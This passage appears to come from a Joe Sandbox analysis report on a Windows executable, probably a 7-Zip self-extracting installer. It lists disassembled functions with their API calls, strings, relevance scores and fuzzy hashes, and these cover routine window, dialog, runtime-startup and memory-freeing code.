SetWindowPos.USER32(?,00000000,?,?,?,00000000,00000004), ref: 004074A3
GetClientRect.USER32(?,?), ref: 0040753D

Part of subcall function 004072C6: GetDlgItem.USER32(?,?), ref: 004072E4
Part of subcall function 004072C6: SetWindowPos.USER32(00000000), ref: 004072EB

ClientToScreen.USER32(?,?), ref: 00407446

Part of subcall function 004071BD: GetDlgItem.USER32(?,?), ref: 004071C9

GetSystemMetrics.USER32(00000008), ref: 004075C2
GetSystemMetrics.USER32(00000007), ref: 004075C9

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: MetricsSystem$ClientItemWindow$LongRectScreen$Parent
String ID:
API String ID: 747815384-0
Opcode ID: ae888a572df34d8200fbb5f065eb0fa3bdccac2998dde38db5d0dc60573d1a76
Instruction ID: 27a08476a10642596e4b9d74cae09f61027c0f3cc76a3fdd313218faaf2b79ea
Opcode Fuzzy Hash: ae888a572df34d8200fbb5f065eb0fa3bdccac2998dde38db5d0dc60573d1a76
Instruction Fuzzy Hash: 69A13C71E04609AFDB14CFB9CD85AEEBBF9EB48304F148529E905F3291D778E9008B65

Function 00403400 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 264COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,004193C0,00000000), ref: 00403489
??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,004193C0,00000000), ref: 00403491
??3@YAXPAX@Z.MSVCRT(0040470C,?), ref: 004036B7

Part of subcall function 0040269A: ??3@YAXPAX@Z.MSVCRT(?,-00000008,00404A32,?,?,?), ref: 004026A0
Part of subcall function 0040269A: ??3@YAXPAX@Z.MSVCRT(?,?,-00000008,00404A32,?,?,?), ref: 004026A7

??3@YAXPAX@Z.MSVCRT(0040470C,?,?,00000000,00000000,004193C0,00000000), ref: 004036E4

Strings

{\rtf, xrefs: 00403584, 00403599
0VA, xrefs: 0040363B, 00403641, 00403648, 00403651
SetEnvironment, xrefs: 00403613

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: ??3@
String ID: 0VA$SetEnvironment${\rtf
API String ID: 613200358-2390373888
Opcode ID: d2b1c421a04f985f795d6f716a120d89dd10d32365d08795990d937a98e965f4
Instruction ID: 87565cb6d8bbb35d5cc273a3f84cdf02fa03a2bcc309534b5b5a97bb7c5f0c64
Opcode Fuzzy Hash: d2b1c421a04f985f795d6f716a120d89dd10d32365d08795990d937a98e965f4
Instruction Fuzzy Hash: 9891BD31D00208BBDF21AFA1DD51AEE7BB8AF14309F20407BE841772E1DA795B06DB49

Function 0041382F Relevance: 16.6, APIs: 11, Instructions: 111COMMON

Download Yara Rule

APIs

__set_app_type.MSVCRT ref: 0041385C
__p__fmode.MSVCRT ref: 00413871
__p__commode.MSVCRT ref: 0041387F
__setusermatherr.MSVCRT ref: 004138AB
_initterm.MSVCRT ref: 004138C1
__getmainargs.MSVCRT ref: 004138E4
_initterm.MSVCRT ref: 004138F4
GetStartupInfoA.KERNEL32(?), ref: 00413933
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00413957
exit.MSVCRT ref: 00413967
_XcptFilter.MSVCRT ref: 00413979

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
String ID:
API String ID: 801014965-0
Opcode ID: eb2cf8166488941d166303a2e7f1762bb68f066f698331e9c3b40d0cb6435919
Instruction ID: 5122df4da7c12dbd5cee10cc3a7810c6062e66137140a5a107582b8573bb02de
Opcode Fuzzy Hash: eb2cf8166488941d166303a2e7f1762bb68f066f698331e9c3b40d0cb6435919
Instruction Fuzzy Hash: BA415BB1D50744EFDB219FA4D845BEA7BB8EB49711F20412FE44197391C7B84A81CB58

Function 00407823 Relevance: 16.6, APIs: 11, Instructions: 87windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00407831
GetWindowLongW.USER32(00000000), ref: 00407838
DefWindowProcW.USER32(?,?,?,?), ref: 0040784E
CallWindowProcW.USER32(?,?,?,?,?), ref: 0040786B
GetSystemMetrics.USER32(00000031), ref: 0040787D
GetSystemMetrics.USER32(00000032), ref: 00407884
GetWindowDC.USER32(?), ref: 00407896
GetWindowRect.USER32(?,?), ref: 004078A3
DrawIconEx.USER32(00000000,?,?,?,?,?,00000000,00000000,00000003), ref: 004078D7
ReleaseDC.USER32(?,00000000), ref: 004078DF

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: Window$MetricsProcSystem$CallDrawIconLongParentRectRelease
String ID:
API String ID: 2586545124-0
Opcode ID: 127c443f7cc8da3ca14b37cbf5cd9ef0ee5655b57506046fb41dccdc85244fb6
Instruction ID: 0b69cac6d3a88e426d6ff8758e07239202df165225e4a2dce5f130aa01be730a
Opcode Fuzzy Hash: 127c443f7cc8da3ca14b37cbf5cd9ef0ee5655b57506046fb41dccdc85244fb6
Instruction Fuzzy Hash: E021F97650060AEFCB01AFA8DD48EDF3BA9FB48351F008525F915E6190CB74E910DB65

Function 00403BA2 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 92COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,-00000001,;!@InstallEnd@!,;!@Install@!UTF-8!,?,00000000,00000000), ref: 00403BE9

Part of subcall function 00402A0D: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,;!@Install@!UTF-8!,?,00000000,00000000), ref: 00402A80

??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,-00000001,?,?,00000000,-00000001,;!@InstallEnd@!,;!@Install@!UTF-8!,?,00000000,00000000), ref: 00403C0F
wsprintfA.USER32 ref: 00403C31
wsprintfA.USER32 ref: 00403C5E

Strings

;!@Install@!UTF-8!, xrefs: 00403BAE
:%hs, xrefs: 00403C2B
:Language:%u, xrefs: 00403C58
;!@InstallEnd@!, xrefs: 00403BBD

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: ??3@$wsprintf
String ID: :%hs$:Language:%u$;!@Install@!UTF-8!$;!@InstallEnd@!
API String ID: 2704270482-695273242
Opcode ID: 9ae0ee48d956ebc158ea1b515db1e5daa1460f0fae3ddab712f6acd0183a952e
Instruction ID: 9d93b3f3b108edfb0f00dda14ecc0a1ac1becc65812ee6aaf2e5fef7c6953118
Opcode Fuzzy Hash: 9ae0ee48d956ebc158ea1b515db1e5daa1460f0fae3ddab712f6acd0183a952e
Instruction Fuzzy Hash: 9D21B472B00519ABDB01FAA5CD85EFD73ADAB48704F14802FF504F32C1CB789A068B99

Function 00407028 Relevance: 13.5, APIs: 9, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000004B3), ref: 0040703C
SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 0040704F
GetDlgItem.USER32(?,000004B4), ref: 00407059
SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 00407061
SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00407071
GetDlgItem.USER32(?,?), ref: 0040707A
SendMessageW.USER32(00000000,000000F4,00000001,00000001), ref: 00407082
GetDlgItem.USER32(?,?), ref: 0040708B
SetFocus.USER32(00000000,?,?,00000000,00407F9B,000004B3,00000000,?,000004B3), ref: 0040708E

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: ItemMessageSend$Focus
String ID:
API String ID: 3946207451-0
Opcode ID: 83591c7242e4733216ec8120015317eeb511db45ace1dd7a81700241ea92acb2
Instruction ID: ac3eac6f6a5d23dfb33c6f00e103186fc87c4e398078883204236830092b285c
Opcode Fuzzy Hash: 83591c7242e4733216ec8120015317eeb511db45ace1dd7a81700241ea92acb2
Instruction Fuzzy Hash: 9BF04F72240708BBEA212B61DD86F9BBA5EDF80B54F018425F340650F0CBF3AC109A28

Function 00407649 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 39libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(uxtheme,?,004089A8,000004B1,00000000,?,?,?,?,?,00408AB5), ref: 00407651
GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 00407662
GetWindow.USER32(?,00000005), ref: 0040767B
GetWindow.USER32(00000000,00000002), ref: 00407691

Strings

SetWindowTheme, xrefs: 0040765C
hA, xrefs: 00407684
uxtheme, xrefs: 0040764A

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: Window$AddressLibraryLoadProc
String ID: hA$SetWindowTheme$uxtheme
API String ID: 324724604-1539679821
Opcode ID: 80bf877f136b08889d9e5f4a8a5d9d855f6c5cd229e99b8175ebd185f35b86be
Instruction ID: 96ee7b80554ba3a4b118cc962054e33398f60e347ce36d0b88b8db399e3538ac
Opcode Fuzzy Hash: 80bf877f136b08889d9e5f4a8a5d9d855f6c5cd229e99b8175ebd185f35b86be
Instruction Fuzzy Hash: 3FF02772E46F2533C231136A6C48F9B669C9F85B707064536B805F7281DAAAEC0081EC

Function 0040769E Relevance: 12.1, APIs: 8, Instructions: 69COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,00419438,00000160), ref: 004076BD
SystemParametersInfoW.USER32(00000029,00000000,?,00000000), ref: 004076DC
GetDC.USER32(00000000), ref: 004076E7
GetDeviceCaps.GDI32(00000000,0000005A), ref: 004076F3
MulDiv.KERNEL32(?,00000048,00000000), ref: 00407702
ReleaseDC.USER32(00000000,?), ref: 00407710
GetModuleHandleW.KERNEL32(00000000), ref: 00407738
DialogBoxIndirectParamW.USER32(00000000,?,?,Function_00006EE0), ref: 0040776D

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: CapsDeviceDialogHandleIndirectInfoModuleParamParametersReleaseSystemmemcpy
String ID:
API String ID: 2693764856-0
Opcode ID: f32e2efff65d8c7350818911c104fb39d10c633f79d1afb389a2c80124d65094
Instruction ID: 6b4ef5ea24060658d5863b79bc38f96fa154aaa2e89c1bfb3ba309e5e1f78dd9
Opcode Fuzzy Hash: f32e2efff65d8c7350818911c104fb39d10c633f79d1afb389a2c80124d65094
Instruction Fuzzy Hash: 8021D1B1900618FFD7215BA19C88EEB7B7CFB44741F0000B6FA09A2290D7749E848F69

Function 0040720C Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 0040721C
GetSystemMetrics.USER32(0000000B), ref: 00407238
GetSystemMetrics.USER32(0000003D), ref: 00407241
GetSystemMetrics.USER32(0000003E), ref: 00407249
SelectObject.GDI32(?,?), ref: 00407266
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00407281
SelectObject.GDI32(?,?), ref: 004072A7
ReleaseDC.USER32(?,?), ref: 004072B6

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: MetricsSystem$ObjectSelect$DrawReleaseText
String ID:
API String ID: 2466489532-0
Opcode ID: 30350efc689a7719ea887eb8f4495072b611486211cb3e9d7370f6f07856f78e
Instruction ID: 0ddf9739e914bca3a0fdf19f43e85ccaed600b4ac583c8006899e124ffc187c2
Opcode Fuzzy Hash: 30350efc689a7719ea887eb8f4495072b611486211cb3e9d7370f6f07856f78e
Instruction Fuzzy Hash: 3C216572900609EFCB018FA5DD44A8EBFF4EF48364F20C4AAE419A72A0C335AA50DF40

Function 00408196 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102windowCOMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004081D0
GetDlgItem.USER32(?,000004B8), ref: 004081EE
SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00408200
wsprintfW.USER32 ref: 0040821E
??3@YAXPAX@Z.MSVCRT(?), ref: 004082B6

Strings

%d%%, xrefs: 00408218

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: ??3@ItemMessageSendUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
String ID: %d%%
API String ID: 3753976982-1518462796
Opcode ID: 42cd89c95a49925efe798b81d99ff8d4be5088a633c9ff9fdeeda3677ef6b080
Instruction ID: c98f75f04a9c9230d8836c9ffda7361431c24c45b39ddc8f7b463edf0082575f
Opcode Fuzzy Hash: 42cd89c95a49925efe798b81d99ff8d4be5088a633c9ff9fdeeda3677ef6b080
Instruction Fuzzy Hash: F7319171900704FBCB159F60DD45EDA7BB9FF48704F10806EFA46662E1CB75AA11CB68

Function 004083AD Relevance: 10.6, APIs: 7, Instructions: 63timethreadinjectionCOMMON

Download Yara Rule

APIs

EndDialog.USER32(?,00000000), ref: 004083C7
KillTimer.USER32(?,00000001), ref: 004083D8
SetTimer.USER32(?,00000001,00000000,00000000), ref: 00408402
SuspendThread.KERNEL32(00000294), ref: 0040841B
ResumeThread.KERNEL32(00000294), ref: 00408438
EndDialog.USER32(?,00000000), ref: 0040845A

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: DialogThreadTimer$KillResumeSuspend
String ID:
API String ID: 4151135813-0
Opcode ID: 35681ac8209b8d1f5ee70de779bcd553034dbd3016c3fd281c537b84293da185
Instruction ID: a6440e5942dbc82c6b0340cb4ae65663e5addf35b072ffdb2faf6fa56e3ea6cc
Opcode Fuzzy Hash: 35681ac8209b8d1f5ee70de779bcd553034dbd3016c3fd281c537b84293da185
Instruction Fuzzy Hash: 59119171200B09EFD7146F61EE94AAB3BADFB81B49704C03EF996A11A1DB355C10DA6C

Function 00404032 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,?,?,%%M\,0041572C,?,?,00000000,00404622,?,?,00000000,?,?,00406260,?), ref: 00404078
??3@YAXPAX@Z.MSVCRT(?,?,?,%%M/,0041571C,?,?,?,%%M\,0041572C,?,?,00000000,00404622,?,?), ref: 004040B6
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%M/,0041571C,?,?,?,%%M\,0041572C,?,?,00000000), ref: 004040DC
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%M/,0041571C,?,?,?,%%M\,0041572C,?,?), ref: 004040E4

Strings

%%M\, xrefs: 00404058
%%M/, xrefs: 00404096

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: ??3@
String ID: %%M/$%%M\
API String ID: 613200358-4143866494
Opcode ID: 8677c02abf867bd37ca258bec985b4f5904aef2a07f64a71b164819d4d184b46
Instruction ID: 0aef16b05ee34c363868bff67d8d58263bc671b78327bff7a9d128d2c4d1c409
Opcode Fuzzy Hash: 8677c02abf867bd37ca258bec985b4f5904aef2a07f64a71b164819d4d184b46
Instruction Fuzzy Hash: AC11F935C0010AFADF05FFA1D993CED7B39AF10308F50812AB915721E1DB7866899B88

Function 00403EBC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,?,?,%%T\,0041572C,?,?,00000000,00404622,?,?,00000000,?,?,00406260,?), ref: 00403F02
??3@YAXPAX@Z.MSVCRT(?,?,?,%%T/,0041571C,?,?,?,%%T\,0041572C,?,?,00000000,00404622,?,?), ref: 00403F40
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%T/,0041571C,?,?,?,%%T\,0041572C,?,?,00000000), ref: 00403F66
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%T/,0041571C,?,?,?,%%T\,0041572C,?,?), ref: 00403F6E

Strings

%%T/, xrefs: 00403F20
%%T\, xrefs: 00403EE2

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: ??3@
String ID: %%T/$%%T\
API String ID: 613200358-2679640699
Opcode ID: f3f3d5414f060ac97f84cd4fb4e76d4c066e7be8abca8f8d98a1b02d4c47ed12
Instruction ID: 8200ff4dc01eb7e5f3d0cd3b0db6b275db18d134b8f46633e684875e90eeb5b2
Opcode Fuzzy Hash: f3f3d5414f060ac97f84cd4fb4e76d4c066e7be8abca8f8d98a1b02d4c47ed12
Instruction Fuzzy Hash: 7D11C935D00109FADF05FFA1D897CEDBB79AF10308F50812AB915721E1DB7856899B98

Function 00403F77 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,?,?,%%S\,0041572C,?,?,00000000,00404622,?,?,00000000,?,?,00406260,?), ref: 00403FBD
??3@YAXPAX@Z.MSVCRT(?,?,?,%%S/,0041571C,?,?,?,%%S\,0041572C,?,?,00000000,00404622,?,?), ref: 00403FFB
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%S/,0041571C,?,?,?,%%S\,0041572C,?,?,00000000), ref: 00404021
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%S/,0041571C,?,?,?,%%S\,0041572C,?,?), ref: 00404029

Strings

%%S/, xrefs: 00403FDB
%%S\, xrefs: 00403F9D

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: ??3@
String ID: %%S/$%%S\
API String ID: 613200358-358529586
Opcode ID: 328ca1379e14b8368c30dedf60bee0167d5db9aa9a8115ce74c1d677a53725c7
Instruction ID: ba471a5e309da56b19bd8a7b5a96c0f25c3cff1cb933eb2d3e2d1b68bec26358
Opcode Fuzzy Hash: 328ca1379e14b8368c30dedf60bee0167d5db9aa9a8115ce74c1d677a53725c7
Instruction Fuzzy Hash: 1811F935C00109FADF05FFA1D993CEE7B38AF10308F50812AB915721E1DB7856899B88

Function 0040D79C Relevance: 10.5, APIs: 1, Strings: 6, Instructions: 42COMMON

Download Yara Rule

APIs

_CxxThrowException.MSVCRT(00416CB4,00417010), ref: 0040D834

Strings

plA, xrefs: 0040D7F5
XkA, xrefs: 0040D7B1
xmA, xrefs: 0040D7B8
`lA, xrefs: 0040D7FC
xmA, xrefs: 0040D7AA
XkA, xrefs: 0040D7A3

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: ExceptionThrow
String ID: XkA$XkA$`lA$plA$xmA$xmA
API String ID: 432778473-1797977924
Opcode ID: 53bc111bba272141f362da7732371027c6ffd9fc40c0fe37927965c24cbe44eb
Instruction ID: 93ec62a24b9d8e66450440f0cc9ce576a4bb083ddd4f3a3c79e319c7eabf7869
Opcode Fuzzy Hash: 53bc111bba272141f362da7732371027c6ffd9fc40c0fe37927965c24cbe44eb
Instruction Fuzzy Hash: AB11D3B0601B008AC3308F169549587FBF8EF51758712CA1FD09A97A10D3F8E1888B99

Function 004054C1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 92COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,00419858,00000001,00419858,00419858,00000001,?,00000000), ref: 00405543
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00419858,;!@InstallEnd@!,00000000,;!@Install@!UTF-8!,0041942C,00419858,00000001,?,00000000), ref: 004055A5
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00419858,;!@InstallEnd@!,00000000,;!@Install@!UTF-8!,0041942C,00419858,00000001,?,00000000), ref: 004055BD

Part of subcall function 004036F1: lstrlenW.KERNEL32(004017CF,00000000,?,?,?,?,?,?,004017CF,?), ref: 004036FE
Part of subcall function 004036F1: GetSystemTimeAsFileTime.KERNEL32(?,004017CF,?,?,?,?,004017CF,?), ref: 00403774
Part of subcall function 004036F1: GetFileAttributesW.KERNELBASE(?,?,?,?,?,004017CF,?), ref: 0040377B
Part of subcall function 004036F1: ??3@YAXPAX@Z.MSVCRT(?,004017CF,?,?,?,?,004017CF,?), ref: 0040383A

Strings

;!@Install@!UTF-8!, xrefs: 0040555E
;!@InstallEnd@!, xrefs: 00405578

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: ??3@$FileTime$AttributesSystemlstrlen
String ID: ;!@Install@!UTF-8!$;!@InstallEnd@!
API String ID: 4038993085-372238525
Opcode ID: 6ca09179b832223042facc11ae16c442de1ccabb0ed3d8059e6af2b2fd03001d
Instruction ID: 9c73dee187ac7940ac785f0cdfe29d60513ad58ba118a45472d9fba9eb214e5e
Opcode Fuzzy Hash: 6ca09179b832223042facc11ae16c442de1ccabb0ed3d8059e6af2b2fd03001d
